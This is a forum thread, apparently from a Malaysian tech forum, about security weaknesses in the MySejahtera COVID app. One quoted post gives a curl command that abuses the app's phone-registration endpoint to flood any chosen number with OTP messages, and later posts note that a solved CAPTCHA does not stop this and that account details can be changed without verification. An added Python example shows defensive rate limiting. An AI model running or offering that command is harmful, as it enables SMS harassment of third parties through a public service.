MySejahtera Not So Sejahtera, Full of Exploits

kidmad | Oct 19 2021, 08:47 AM

QUOTE(Darkripper @ Oct 18 2021, 11:13 PM)
you're talking about their backend implementation, which is out-of-reach. Client trigger mysejahtera, which in turn they forward it to provider. It doesn't matter how the backend is implemented if they open their doors wide open.

the way u put it there is something so wrong in terms of the app design. the request should trigger a notification and queue the request somewhere instead of client calling the service immediately. anyway 0 marks to the application design in this case

PzGman | Oct 19 2021, 08:55 AM

no offense but that app is crap lol

God Grid | Oct 19 2021, 10:37 AM | New Member

QUOTE(Darkripper @ Oct 19 2021, 02:51 AM)
jquery is top go-to library when everyone is manually manipulating HTML elements for frontend, it is easier to use than vanilla JS. It is not bad, just it is not that relevant anymore. Then SPA like Angular, React comes along, which is easier to code, a little bit more structured and efficient. The best thing about SPA is there is less page refresh, providing a better UX. Now you even have Vue, Svelte, SolidJS which is trying to overtake React. It's not just for UI, but for client-side aka frontend to render and do whatever it needs to (communicate with server, service worker to run some shit in the background)

yea, jQuery have been more than 10 years? 20 years? but got Ajax ma ahahahahaha only used Vue for their UI like the Vuetify. Now it's all about single page application. everything click click click, no idea if it's going to next page or previous page or anything

deejay_krish | Oct 19 2021, 10:48 AM

so called 70mil

WaCKy-Angel | Oct 20 2021, 11:52 AM

QUOTE(Darkripper @ Oct 18 2021, 01:51 PM)
You can instruct "MySejahtera" to spam OTP to others at will. Just run the following code at terminal of choice and change contact number (Windows users, work out how to change it yourselves)
CODE
curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \
--form 'countryCode="60"' \
--form 'contactNumber="12345678"'

https://www.malaymail.com/news/malaysia/202...res-why/2014651
ur doing? lol

kons | Oct 20 2021, 12:06 PM | Конс

QUOTE(WaCKy-Angel @ Oct 20 2021, 11:52 AM)

yeah someone spam my number with sj otp and i send the screenshot to their helpdesk

diffyhelman2 | Oct 20 2021, 01:19 PM

QUOTE(WaCKy-Angel @ Oct 20 2021, 11:52 AM)

LOL, beat me to it: https://www.freemalaysiatoday.com/category/...ys-mysejahtera/

C-Fu | Oct 20 2021, 01:38 PM

QUOTE(Darkripper @ Oct 18 2021, 02:27 PM)
They can't do that, as that's the endpoint that client side is calling to trigger it. Easiest way is just to rate limit + some kind of Captcha. That would reduce the exposure to an acceptable limit. It won't solve all, but it reduces the exposure.

seems like got captcha now

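[Added example, not part of the thread and not MySejahtera's code.] The "rate limit" half of the mitigation quoted above, written server-side: the cap is keyed on the destination number as well as the client IP, so it still holds when requests come from many addresses or carry a solved CAPTCHA. The class name, the limits and the phone number and IPs in `demo()` are assumptions constructed for illustration.

```python
import time
from collections import defaultdict, deque

class OtpThrottle:
    """Sliding-window limits for an OTP-send endpoint (hypothetical helper)."""

    def __init__(self, per_number=3, per_ip=10, window=600, cooldown=60,
                 clock=time.monotonic):
        # Assumed limits: 3 OTPs per number and 10 per client IP in 10 minutes,
        # with at least 60 s between two sends to the same number.
        self.limits = {"number": per_number, "ip": per_ip}
        self.window, self.cooldown, self.clock = window, cooldown, clock
        # In-memory store for the example; a multi-server deployment would
        # need a shared store with expiry.
        self.hits = defaultdict(deque)  # (kind, key) -> send timestamps

    def _recent(self, kind, key, now):
        q = self.hits[(kind, key)]
        while q and now - q[0] >= self.window:
            q.popleft()  # drop sends that fell out of the window
        return q

    def allow(self, number, ip):
        """Return (allowed, reason); a send is recorded only when allowed."""
        now = self.clock()
        by_number = self._recent("number", number, now)
        by_ip = self._recent("ip", ip, now)
        if by_number and now - by_number[-1] < self.cooldown:
            return False, "cooldown"
        # Checked per destination first: this cap holds even when requests
        # arrive from many IPs or with a solved CAPTCHA.
        if len(by_number) >= self.limits["number"]:
            return False, "number_limit"
        if len(by_ip) >= self.limits["ip"]:
            return False, "ip_limit"
        by_number.append(now)
        by_ip.append(now)
        return True, "sent"

def demo():
    """Constructed traffic: one number requested from a new IP every 61 s."""
    t = [0.0]
    throttle = OtpThrottle(clock=lambda: t[0])
    reasons = []
    for i in range(5):
        reasons.append(throttle.allow("60123456789", f"198.51.100.{i}")[1])
        t[0] += 61
    return reasons

if __name__ == "__main__":
    print(demo())
```

The endpoint would return the same response body whether or not the OTP was actually sent, so the throttle state is not exposed to the caller.
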
klangboy83 | Oct 20 2021, 03:01 PM

5 Unicorns by 2025

flexyx | Oct 20 2021, 03:04 PM | Getting Started

Doesn't work anymore
This post has been edited by flexyx: Oct 20 2021, 03:04 PM

Hobbez | Oct 20 2021, 03:09 PM

Does anyone think it can send your data to any third parties? I don't even want to go there....

brkli | Oct 20 2021, 04:05 PM

Poor TS...

ye0073 | Oct 20 2021, 04:08 PM

Someone using the TS code and doing spam liao. Need to report police.

TS Darkripper | Oct 20 2021, 04:46 PM

QUOTE(brkli @ Oct 20 2021, 04:05 PM)

What?

PJng | Oct 20 2021, 06:14 PM

IamNOT | Oct 21 2021, 10:40 AM | Getting Started

Fxxk... The change email/phone no do not require verification from old email/phone no..... Security 404... Use throw away email also useless...

TS Darkripper | Oct 21 2021, 02:57 PM

QUOTE(IamNOT @ Oct 21 2021, 10:40 AM)
Fxxk... The change email/phone no do not require verification from old email/phone no..... Security 404... Use throw away email also useless...

aiya, they say it's a feature that get exposed. lel... *FEATURE*. Btw they haven't fix yet also, just add reCAPTCHA, which can be solved using API also

emburrar | Oct 21 2021, 02:58 PM | New Member

Snake KJ answers

filage | Dec 25 2021, 10:38 AM

Got anyway to make the mysejahtera load faster? If just want to show the fully vaccinated page also take quite 10-15 seconds to load, any workaround to make it faster?

PJng | Dec 25 2021, 11:04 AM

QUOTE(filage @ Dec 25 2021, 10:38 AM)
Got anyway to make the mysejahtera load faster? If just want to show the fully vaccinated page also take quite 10-15 seconds to load, any workaround to make it faster?

Turn off data, more faster